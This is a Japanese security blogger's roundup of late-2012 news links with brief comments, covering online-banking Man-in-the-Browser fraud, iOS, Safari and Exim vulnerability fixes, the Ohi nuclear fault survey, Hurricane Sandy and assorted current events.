「悪魔のような形相だった検事に狂気をみた」
かつて「特捜の鬼」と呼ばれた検事がいた。主に大阪地検を中心とする「関西検察」で過ごし、大阪高検検事長を最後に退官した故別所汪太郎(おうたろう)(平成10年没)である。
(中略)
別所はおごりとも無縁だった。妥協を許さず、無駄と思えるほど証拠を集め、捜査を尽くす泥臭い姿勢で知られた。捜査でつかんだ真相に照らし、容疑者を不起訴とする場合でも「捜査は成功」と評価するバランス感覚があった。
その「魂」は、大阪特捜で脈々と受け継がれてきたはずだった。
逢坂は「伝統がプツンと切れた」と嘆く。
なぜそうなったのか。多くの検察OBは昭和60年代から平成初期にかけての一時期、捜査や起訴が適正か否かを判断する上司の決裁が甘くなった影響を指摘する。
法務検察は当時、検事の任官志望者の減少と退官者の増加という深刻な人材難に直面し、上命下服の厳しい管理が原因とみて決裁を緩和した。若手を育成する機会である決裁が機能しなかった一時期を経て伝統が断絶し、時代の変遷とともに「魂」も失われた−というのだ。
(5完)「半グレ」「復興利権」…全方位で「最強の捜査機関」 (産経, 10/26)
大失敗が明らかになったのだから、他とくらべればむしろ再生しやすいはずなんですけどねえ。
大飯原発:破砕帯の再調査も 「活断層否定できぬ」 (毎日, 11/2)
台場浜付近のトレンチでは、関電があると想定していた場所にF−6破砕帯がないことが判明。調査団メンバーで、活断層の危険性を早くから指摘していた渡辺満久・東洋大教授は「関電の想定とは別の場所に破砕帯があった」と指摘し、関電が10月31日に提出した中間報告を問題視。そのうえで「活断層かははっきりしないが、否定できない」と述べた。
大飯原発、活断層の可能性指摘 規制委 (中日, 11/3)
大飯原発:トレンチ入念に観察 活断層か明言避ける−−原子力規制委・破砕帯調査 /福井 (毎日, 11/3)
大飯原発:活断層否定できず…7日に再議論 規制委調査団 (毎日, 11/4)
以前から危険性を指摘してきた渡辺満久・東洋大教授は「敷地内に活断層があるのは確実」と指摘。これに対し、重松紀生・産業技術総合研究所主任研究員と、岡田篤正・立命館大教授は「現時点では活断層があるとみなすことはできない」として、判断にはさらに調査が必要との見解を示した。
会合後、島崎邦彦委員長代理(前地震予知連絡会会長)は報道陣に「今の段階で活断層か地滑りか、どちらかに絞ることはできなかった。地滑りなら起こるのは限定的なので、F−6破砕帯とのつながりはなく、問題にならない」との認識を示した。
「大飯原発破砕帯調査評価会合」2012年11月4日配信メモ (togetter, 11/4)
》 米裁判所、顧客が読んでいない『ユーザー使用許諾契約』は無効という判断を下す (slashdot.jp, 11/2)。ほとんど読まれてないんじゃ……。
》 8.6探検隊【 原爆投下「8時15分」は違うって本当?】 (10代がつくる平和新聞 − ひろしま国)。こんなに諸説あったのか。
》 68年ぶりの解読:英民家煙突から軍鳩の骨と暗号文発見 (毎日, 11/3)
》 発見!幻の巨大軍船 〜モンゴル帝国vs日本 730年目の真実〜 (NHK スペシャル, 11/3 放送)。関連:
閑古堂 @1969KANKODO さんによる、NHKスペシャル「発見!幻の巨大軍船 〜モンゴル帝国vs日本 730年目の真実」のまとめ (togetter, 11/4)
世界史講義録 第42回 モンゴル帝国の発展 (世界史講義録, 2000.7.9)
NHKスペシャル 蒙古襲来(幻の巨大軍船) (水中考古学/船舶・海事史研究, 11/2)
いままでの、これらの地道な調査のもとに、今回の発見がありました。現在、国の指定遺跡となりましたが、今後ますます発見が相次ぐことでしょう。実は、今回の発見は、それほど保存状態の良い船ではないというのが水中考古学の専門家からの意見です。引き揚げには資金が掛かりますので、慎重を要します。この発見よりも、もっと凄い発見がまだまだま待っているはずです。それらを探すことがこれからの作業になると思われます。これ以上の船はたくさん眠っているはずです。
まだまだ序の口だと……
さて、番組の内容にもどりますが、実は私も出演予定です。ここでも何度か紹介しているベトナムの元寇(白藤江の戦い)の調査の様子が紹介されます。番組の最後のほうで3−4分ほどですが、出るそうです。百聞は一見にしかずですから、是非、多くの人に見てもらいたいですね。11月には簡単な調査も計画されています。
白藤江の戦い関連:
モンゴル帝国を退けた国・人物 (歴史放談, 2010.08.21)。マムルーク朝 (シリア) のバイバルス、 陳朝 (ベトナム) の陳興道は、それぞれの国では今でも英雄だと。
陳朝ベトナムはどうやって強大なモンゴル帝国の侵攻を防ぎきったのでしょうか? (Yahoo! 知恵袋, 2/1)
ベトナム白藤江の戦い(1288年)考古学調査報告01 (水中考古学/船舶・海事史研究, 2011.12.07)
この白藤江の戦いで勝利した将軍陳興道はベトナムの英雄として現在でも親しみを持って崇拝されています。将軍陳興道を奉るお寺など各地にあり、また、多くの町に必ず陳興道にちなんだ道や地域の名前などを見ることが出来ます。左の写真は現地の陳興道のお祭りの準備をしているところ。紙で作った(モンゴルの?)馬などもあります。国の独立を死守した英雄は今でもベトナム人の心に生き続けています。
こういう伝統が、20 世紀の独立戦争にも生きていたんだろうなあ。
白藤江の戦い 考古学調査ブログ No.2 (水中考古学/船舶・海事史研究, 1/29)
水中考古学遺跡ー初の国指定! (水中考古学/船舶・海事史研究, 2/18)
》 最高裁は、何故予定を早めて「代表選投票日に小沢起訴議決」をしたのか? (一市民が斬る!!, 10/31)。一市民さんの推理が正しいかどうかはともかく、 情報が開示されなさすぎなんだよなあ。
》 福島:原発事故で国道6号が不通 国道349号、交通量が急増 近所に行くのも命がけ (毎日, 11/2)。これはひどい……。
》 沿岸の宿泊施設8割復旧へ 2ホテルが11月再開 (岩手日報, 10/31)
》 日本脳炎予防接種:死亡男児、併用禁止薬を服用 (毎日, 11/1)。うわ……。
関連: 日本脳炎:ワクチン接種後に237件重症化 厚労省報告 (毎日, 10/31)。 他の事例では、上記のような有力理由があるのだろうか。 これか: 第7回厚生科学審議会感染症分科会予防接種部会日本脳炎に関する小委員会資料 (厚生労働省, 10/31)
》 羽佐間道夫:「字幕なんてやめろ」と吹き替えに誇り 「俺がハマーだ!」を振り返る (毎日, 11/2)。「俺がハマーだ!」DVD ボックス!
吹き替えに対しての熱い思いが止まらない羽佐間さんは「吹き替えを信用していない制作者が多いんだよ。もう少し、そういう(上手な)声優さんを選んで制作すれば、画面ががらりと変わってしまうというのがある。この作品がいい例だと思う」と力を込める。「吹き替えの面白さを楽しむためには、我々の技術も成長しなきゃいけないんだけど、字幕なんてやめろって。みんなだめだよ、吹き替え見ないと(笑い)。これからどんどんやっていって、吹き替え文化を作っていかないといいものが生まれないよね」と日本語吹き替えの仕事への熱意と愛情をのぞかせた。
いいぞもっとやれ。
》 時論公論 「中国を意識して動き出したロシアの対日戦略」 (NHK 解説委員室, 10/26)
原発頼み、赤字拡大 電力各社、経営転換及び腰 (朝日, 11/1)。「原発に頼ってきた電力会社ほど業績が厳しい」
電通支配はこうして原発報道を歪めてきた (videonews.com, 10/27)
第七回 原子力規制委員会 (原子力規制委員会, 10/24)、 10月29日(月)臨時会見配布資料 (原子力規制委員会, 10/29)。 放射性物質拡散シミュレーション (地形効果考慮せず)。 マスメディアが掲載しているモノは誤解を招きかねないバージョンも散見されるので、まずはオリジナルを参照されたい。
10/24 の第七回委員会では「新たな原子力安全規制制度の概要」も示されている。
活断層の定義を拡大 原子力規制委 (産経, 10/23)
原子力規制委員会の島崎邦彦委員長代理(東京大名誉教授、地震学)は23日 (中略) この日開かれた関西電力大飯原発(福井県)への規制委断層調査団の初会合の後、記者団に明らかにした。 (中略) 島崎氏は「活断層かどうかの判断は、従来の基準にこだわらない。『12万年前』という数字を、私は使ったことはない」と強調。その上で「40万年までは同じと考えてよい」と述べ、年代にはこだわらず古い年代まで遡(さかのぼ)って調査する意向を示した。
発言は、これの後ですね: 大飯発電所敷地内破砕帯の調査に関する有識者会合 事前会合 (原子力規制委員会, 10/23)
新潟 50キロ圏も避難準備すべき (NHK, 11/2)。ふくいちの事例を見れば、当然の反応。
規制委人事、国会事後同意見送り 閣議決定 (朝日, 11/2)
野田内閣は2日、原子力規制委員会の田中俊一委員長と委員4人の人事について、臨時国会での事後同意を見送る手続きを閣議決定した。閣議後、東京電力福島第一原発事故で原子力緊急事態宣言が発令中であることを衆参両院に通知。宣言が出ていれば事後同意が必要とならない「例外規定」を適用した。
収束宣言を終息し、緊急事態を再稼働しました。
》 遠隔操作ウィルスのような攻撃元のなりすましは昔からもっと簡単にやられてるよね (cNotes, 11/1)。はい。
》 デパートにヒト型ロボット登場 (NHK, 11/2)、アンドロイド:自律型「ミナミ」お披露目…大阪 (毎日, 11/2)。ミナミちゃん。高島屋大阪店にいるそうです。自律動作するそうで。
関連: アンドロイド:新素材でより本人に−−石黒・阪大大学院教授が披露 (毎日, 10/27)。石黒先生ジェミノイドも新型になったそうで。
LINEで“混線”? 突然謎のメッセージ 他人のメッセージ表示される不具合か (ITmedia, 10/31)
「LINE」PC版におけるシステム不具合発生と トークメッセージ混線についてのお詫び (NHN Japan, 11/1)
》 リクナビの就活漫画がひどすぎる件 問題表現を削除せよ! (常見 陽平 / アゴラ, 11/2)。こういう会社にナヴィゲートされる就職活動、大丈夫なのか……。
》 NYの地下鉄浸水被害 映像で明らかに (NHK, 11/1)。ハリケーン「サンディ」の爪痕。予想もしない事態というよりは、懸念されていた事態が現実になったという感じだなあ。 水を抜くだけでも数週間ですか。設備の復旧まで含めるともっとかかるわけで。
サンディ関連:
高級ハイブリッド16台が浸水で爆発 米国 (産経 MSN, 11/1)。東日本大震災でも、海水に漬かったクルマが燃えた事例が複数確認されています。
NYのデータセンター、ハリケーンとの闘い (WIRED, 11/1)
これらのデータセンターが入っていた建物は、一方がホワイトホール・ストリート33番地、もう一方が、そこから数ブロックしか離れていないブロード・ストリート75番地にある。両方とも地下には燃料ポンプが備えられていて、停電時のバックアップ用電源として機能する発電機につながっている。だが、地域の送電網がサンディによってダウンし、さらにこの燃料ポンプが浸水したとき、このふたつのデータセンターは代替策まで失うこととなった。
ふくいち状態ですね……。
ブロード・ストリートでも同じようなことが起こったが、こちらは地下だけでなく18階にも発電機があったため、データセンターはダウンを免れたという。
高所に非常用発電機……ふくいち事案対策……。
ただし、このデータセンターを使用するホスティング企業のひとつ、Peer 1社のビジネス開発担当上級副社長であるロバート・ミギンズによると、燃料を確保し運搬するのは困難な作業だという。(中略) Peer 1社の更新は29日12時10分で停止しており、顧客に対して「データをバックアップし、必要な処置を取ってください」と呼びかけている。
補給戦……。 ふくいちでも、燃料切れで注水が止まったりしましたね……。
「ニセ写真」を、慎重に賢く見抜くには〜ハリケーン「サンディ」の事例から (NAVER まとめ, 11/2) (魚拓 page1、 page2、 page3、 page4、 page5、 page6、 page7)
方法1: Google画像検索で確認する (中略)
方法2: TinEyeを使って確認する。(中略)
方法3: 必ずソース(誰が撮影したのか)を確認する。
》 国内著名ネットバンク利用者を狙った Man-in-the-Browser 攻撃か。 前ねた。
“不正画面”ネット銀行で新たに被害も (NHK, 11/2)。楽天銀行、住信 SBI ネット銀行、三菱 UFJ ニコスでも。
中国人に口座を不正譲渡の容疑で逮捕 (NHK, 11/2)
ネットバンキング不正送金 金融庁調査 (NHK, 11/2)
オンラインバンキングの取引にご注意を!! (エフセキュアブログ, 11/2)
》 近い将来、特定の人にだけ感染させるウイルスが作れるようになる (slashdot.jp, 11/1)
》 U.S. gov. accidentally publishes own short-URL 'admin' API key (ZDNet, 11/1)。うわ……。
》 韓国海軍の最新鋭潜水艦でまたも欠陥問題 (環球閑話時事の徒然 IZA見参, 11/2)。韓国の 214型潜水艦、ソン・ウォンイル。 以前、スクリューの推進軸を交換したりもした艦ですが、今回はそれどころじゃないようで。
韓国海軍の主力潜水艦「孫元一(ソン・ウォンイル)」=排水量1800トン級=が、原因不明の故障で20カ月も作戦から外れ、修理を受けていることが1日までに分かった。
韓国海軍によると、孫元一では昨年4月、潜航が困難なほど大きな騒音が発生。その後、海軍は孫元一を完全に解体し、原因究明に乗り出したが、今のところ正確な原因はまだ分かっていないという。
》 マイクロソフトのセキュリティのお仕事って? vol.3 〜TwC 編 (前編) 〜 (日本のセキュリティチーム, 10/31)
現在、私は、社内インターンシップとして、MSRC にて仕事を学んでいます。
そうなんだ……。
》 セキュリティ・ダークナイト(10):フィッシング対策 of Life (@IT, 11/1)。パスワード管理ソフトを使おう、二要素認証を使おう。
》 アップル、「サムスンによる模倣なし」声明の修正を命じられる--英国控訴院、命令違反と判断 (CNET, 11/2)。そういう企業風土。
》 女装して分かった15のこと (Pouch, 11/2)。体験してみないとわからないことって多いのですね。
》 The OpenBSD 5.2 Release (OpenBSD.org, 11/1)。出ました。
》 中国ソーラー業界の落日 (JBpress, 10/24)
》 米アップル:竹島の名称 地図ソフトで三つの併記に変更 (毎日, 11/1)、 韓国:米アップル社に抗議 竹島表記で (毎日, 11/1)。むしろ、併記してなかったのがおかしいわけで。
》 プーチン大統領の健康に臆測 (NHK, 11/1)。プーチン健康不安説。
関連: クレムリン、プーチン大統領の病気説を否定 (ウォール・ストリート・ジャーナル日本版, 11/2)
》 総理大臣官邸などにメール 遠隔操作か (NHK, 11/1)。自民党総裁殺害予告の件。
警視庁は、パソコンが遠隔操作されている疑いもあるとみてパソコンを解析し、ウイルスに感染していないか調べることにしています。
通信内容は解析しないの?
今のところ、VUPEN の Chaouki Bekrar 氏がそのように主張しているだけで、詳細は不明。Microsoft もまだ確認できていない模様。
iOS 6.0.1 登場。4 つのセキュリティ欠陥 (情報漏洩 x 1、攻略 Web ページによる任意のコードの実行 x 2、パスコードロック迂回 x 1) が修正されている。 CVE-2012-3748 CVE-2012-3749 CVE-2012-3750 CVE-2012-5112
地図がグチャボロなので iOS 5 のままという人もいるかと思うが、セキュリティ修正を含むので、速やかに iOS 6.0.1 に移行されたい。
関連: Apple bumps iOS to 6.0.1, fixes an interesting set of bugs (Sophos, 2012.11.01)
iOS6マップに関するMapInfo視点からの考察 (MapInfo)。同じくインクリメントPの地図データを使用している MapInfo StreetPro との比較で見る、iOS 6 地図の問題点。インクリメントPの地図データそれ自体には問題はないことがよくわかる。問題は、日本の地図文化が他国とは異なることを理解していない点、他国とは異なる手法 (1/2500 詳細地図をベースに開発する) を採用できなかった点にあるとする。
Appleマップは、このような地図の周辺にある文化の違いを十分に理解せず、欧米のロジックに従って、日本の道路を描いたのだと推測されます。
ちなみに、Googleマップで1/2500のスタイルで道路縁が描かれているのは、世界各国の中でも日本のみの特別仕様のようです。ニューヨークはもちろん、ロンドン、北京、バンコク、ソウルなどでも道路中心線から書き起こした道路データが採用されています。
実は、StreetPro Japanを製品化する際にも、この国際標準に関する議論が弊社内でもありました。第一案として海外チームから提案された地図デザインは1/25000の道路をベースとし、建物や駅舎が存在しないものでした。最終的には議論の末に日本仕様に落ち着いたという経緯があります。ローカライズには、以外に高い壁があるように思えます。
Safari 6.0.2 登場。攻略 Web ページを閲覧すると任意のコードが実行される、2 件の欠陥が修正されている。 CVE-2012-3748 CVE-2012-5112
Safari 6 が提供されていない、Windows および Mac OS X 10.6 以前では、Safari を使うのはやめましょう。
》 2011年3月24日、福島第一原発 3 号機・原子炉タービン建屋 (400mSv/h)
元原発作業員 関電工を告発 (NHK, 11/1)
1日会見した男性や代理人の弁護士によりますと、男性は、東京に本社がある関電工の下請け企業の社員として、事故直後の去年3月24日、関電工の社員ら5人と共に、福島第一原発の3号機の原子炉タービン建屋で、地下に電源ケーブルを敷く作業に当たったということです。
建屋の地下には水たまりがあり、同じ場所にいた東京電力の作業員は、空間の放射線量が1時間あたり400ミリシーベルトと計測されたため作業をせずに撤退しましたが、男性らは関電工の作業員から一緒に作業を続けるよう指示されたと主張しています。
東電社員はダッシュで逃げ、下請けが厳しい作業を実施。
男性は地下で働くことを拒否し、主に1階で1時間ほど作業しましたが、およそ11ミリシーベルト被ばくしたということです。
このため、男性は、放射線量が高い現場と知りながら作業を続けるよう指示されたと主張して、関電工を労働安全衛生法違反の疑いで労働基準監督署に刑事告発しました。
また、作業を発注した東京電力についても、作業員の安全を確保する必要な措置を怠ったとして労働基準監督署に是正を指導するよう求めました。
》 元ドイツ情報局員が明かす 心に入り込む技術 (阪急コニュニケーションズ)。どんな本かと思ったら、自己実現に関する本だった。
》 2012年11月の呼びかけ 「 濡れ衣を着せられないよう自己防衛を! 」 〜 踏み台として悪用されないために 〜 (IPA, 11/1)
心掛け1 出所の不明なファイルをダウンロードしたり、ファイルを開いたりしない
(中略)
心掛け2 安易にURLリンクをクリックしない
1 はともかく 2 がなぁ……。
》 本人非公認自伝がリークするもの - 『ジュリアン・アサンジ自伝』 (HONZ, 11/1)
》 中国:7中全会が開幕 (毎日, 11/1)。はじまった。
》 国連がテロ目的でのインターネット使用に言及 (エフセキュアブログ, 10/29)
》 ミャンマー・住民対立で 新たに2万人避難 (NHK, 10/29)。今年 6 月にはじまった対立がさらに過熱したということみたい。
ミャンマー西部に非常事態 宗教対立で混乱拡大 (産経, 6/11)
仏教徒の少女暴行が発端 イスラム教と衝突、暴力の連鎖 ミャンマー (産経, 6/12)
関連: [バンコクポスト]ミャンマー衝突、ASEANは行動を (日経, 11/1)
》 EFF calls Ubuntu Shopping Lens a "major privacy problem" (H Security, 10/30)、 Privacy in Ubuntu 12.10: Amazon Ads and Data Leaks (EFF, 10/29)
》 Secunia and F-Secure detect obsolete programs on corporate networks (H Security, 10/31)
サイバー犯罪対策:警察庁が「解析センター」新設 (毎日, 11/1)
これまでの解析は原則として各都道府県警が個別に行い、解析結果を全国で共有する仕組みもなく「地域によって職員の技術的な格差がある」と指摘されてきた。遠隔操作で犯罪予告が書き込まれ4都府県警が4人を誤認逮捕した事件で、警察本部間の連携強化の必要性もクローズアップされた。
こうした現状を踏まえて新設する不正プログラム解析センターでは、過去の実績から高度な技術を持つと判断された各地の専門職員約10人を「不正プログラム解析官」として新たに指定。捜査部門からの解析要請を同センターがすべて把握し、ウイルスの難易度などを分析。得意分野に応じて全国の各解析官に割り振る。
解析以前の部分 (マルウェアらしきモノの発見) については、ひきつづき各都道府県警が個別に行うのかな。
警察庁 新組織で不正ウイルス捜査強化 (NHK, 11/1)
》 芳文社や小学館などの二次創作禁止(?)ガイドラインの真相について、出版社の中の人が解説してくれました。 (togetter, 11/1)。極端な悪質事例に対応するためのものであり、ふつうの人を撃ちまくるつもりはない。伝家の宝刀を抜かずに済むように「うまくやってくれ」と。
》 国内著名ネットバンク利用者を狙った Man-in-the-Browser 攻撃か。 前ねた。
ネットバンキング不正送金の新手口に注意、ログイン後に第二認証情報を詐取 (so-net セキュリティ通信, 10/30)
“不正入力画面”200万円不正に送金 (NHK, 10/30)。実害を確認。
不正送金 中国人グループが関与か (NHK, 10/31)。送金先が中国人だった。
ネットバンキング不正送金 みずほ銀でも (NHK, 11/1)。確認されている攻撃対象は、ゆうちょ、三菱東京 UFJ、三井住友銀行、みずほの 4 つになった。
》 A Look Into The Russian Underground (trendmicro blog, 10/30)
》 Xtreme RAT Targets Israeli Government (trendmicro blog, 10/29)
》 「パーソナルデータの利用・流通に関する研究会」の開催 (総務省, 10/30)。11/1 に第1回が開かれたそうで。
個人データ活用と保護の両立を検討へ (NHK, 11/1)
》 やっぱりあなたの電気代は流用されている。パート2 (河野太郎公式ブログ ごまめの歯ぎしり, 10/26)
さて、日本原燃が電力会社からもらった前受金の1兆1000億円は、電力会社が支払う再処理費用と相殺することになっている。
再処理費用を支払うと言っても、再処理工場が稼働していないのだから、日本原燃は役務の提供を何もできないのが現状だ。ところがどっこい、アクティブ試験を実施した段階で、役務の提供がはじまり、その対価として、再処理量にかかわらず、「基本料金」を電力会社が日本原燃に支払うという契約になっている。
だから、プルトニウムは余っているのに、また、工場は稼働できないのに、アクティブ試験だけ、必死にやらせたのだ。「基本料金」を払うために!
》 大津中2自殺:資料に多数の「黒塗り」 第三者委は不満 (毎日, 10/29)
》 第7回 セキュリティうどん(かまたま)。 2012.12.08、香川県高松市、無料。FFRI の鵜飼さんのお話など。
》 ハリケーン「サンディ」の被害がメールボックスにも (シマンテック, 11/1)
》 選対関係者が「サンディ」関連のデマを投稿か、刑事責任問う声も 米 (CNN, 11/1)。@ComfortablySmug によるデマの件。
@ComfortablySmugは実名を明かしていなかったが、ある男性がネットに掲載された写真を手がかりに、アカウントの持ち主を特定。シェシャンク・トリパシという実名と、ウォール街の金融アナリスト兼、米議会選立候補者(共和党)の選挙運動本部長という肩書きを暴露した。
関連: ハリケーンの最中にパニックを誘発するツイートを流す行為は違法であるべきだ (techcrunch, 11/1)
》 海の向こうの“セキュリティ” 第74回:Symantec、「実世界」の観測結果によるゼロデイ脆弱性の研究論文 (Internet Watch, 11/1)。 An Empirical Study of Zero-day Attack in The Real World が紹介されている。
このように、この論文の内容は、統計的にはさほど意味がないのですが、完全に無意味というわけではありません。
今回の研究でゼロデイの脆弱性として認識された18件のうち、7件はすでにゼロデイ攻撃への悪用が確認されていたものであり、それを改めて具体的に確認したに過ぎませんが、残りの11件はこれまでゼロデイの脆弱性とは認識されておらず、今回の調査でゼロデイ攻撃に悪用されていたことが判明したのです。
また、この論文ではマルウェアファイルのダウンロード数(≒攻撃数)の変化についても紹介しており、それによると、脆弱性の公開直後にいずれも急激な(4桁から5桁の)増加を見せています(図6)。公開後の速やかな対応がいかに重要かを示すものと言えるでしょう。
関連: ゼロデイ脆弱性について (シマンテック, 11/1)
》 Irked by cyberspying, Georgia outs Russia-based hacker -- with photos (itworld, 10/30)、 Counterattack! Suspected hacker caught on HIS WEBCAM, while spying on Georgia (Sophos, 10/31)
ACTA側賞発表! (IT後進国・日本, 9/7)
Japan Was the First to Ratify ACTA. Will They Join TPP Next? (EFF, 10/26)
》 ウイルス対策ソフト誤検知でいくつか寄せられている情報(リンク) (INASOFT 管理人のひとこと, 10/30)
》 「なぜ起きたか分からない」エレベーター死亡事故でシンドラー社会見 (産経, 10/31)、 エレベーターに挟まれ死亡、金沢のホテルで女性従業員 (産経, 10/31)。 アパホテル金沢駅前。またシンドラーだったのか……。
エレベーター事故:またシンドラー製…5500台点検へ (毎日, 11/1)。2006 年のシンドラー製エレベータ事故 (失敗学会) への対応として
国土交通省は建築基準法施行令を改正して09年9月から、ドアが開いている状態で動き出しても自動的に停止する「戸開走行保護装置」の設置などを義務付けた。
のだけど、アパホテル金沢駅前のエレベータは 1998 年設置済なので義務対象外で、アパホテルも放置していたと。
シンドラー社支店を捜索へ エレベーター死亡事故 (朝日, 11/1)
》 Android マルウェア関連容疑者逮捕: the Movie の件
不正アプリ 情報流出防ぐ対策は (NHK, 10/31)
スマホ情報流出:事件発覚直後PC破壊 元会長ら証拠隠滅 (毎日, 10/31)
捜査関係者によると、4月12日に不正アプリがツイッターなどで問題になり、同社は19日に解散し、翌20日には、アプリ制作を発案して逮捕された社員の男(28)が、社内で数台のパソコンのハードディスクを破壊し、大量の書類をシュレッダーで処分しているのを別の社員が目撃したという。5月17日に警視庁が家宅捜索に入った際には、破壊したパソコンは廃棄業者に引き渡された後だった。
というか、家宅捜索って、準備に 1 か月かかるんですね。
スマホ流出発覚後、PC壊し廃棄…証拠隠滅か (読売, 10/31)
情報流出アプリで5人逮捕 スマホから1180万件 供用容疑で警視庁 (日経, 10/30)
》 IHI:戦闘機などの試験データ改ざん 防衛省が厳重注意 (毎日, 10/31)
関連:
Exim 4.70〜4.80におけるDomainKeys Identified Mail(DKIM)処理の脆弱性について - バージョンアップを強く推奨 - (JPRS, 2012.11.01)
Debian セキュリティ勧告 DSA-2566-1 exim4 -- ヒープベースのバッファオーバフロー (Debian, 2012.10.25)
![[セキュリティホール memo]](/~kjm/security/memo/memologo-s.png)
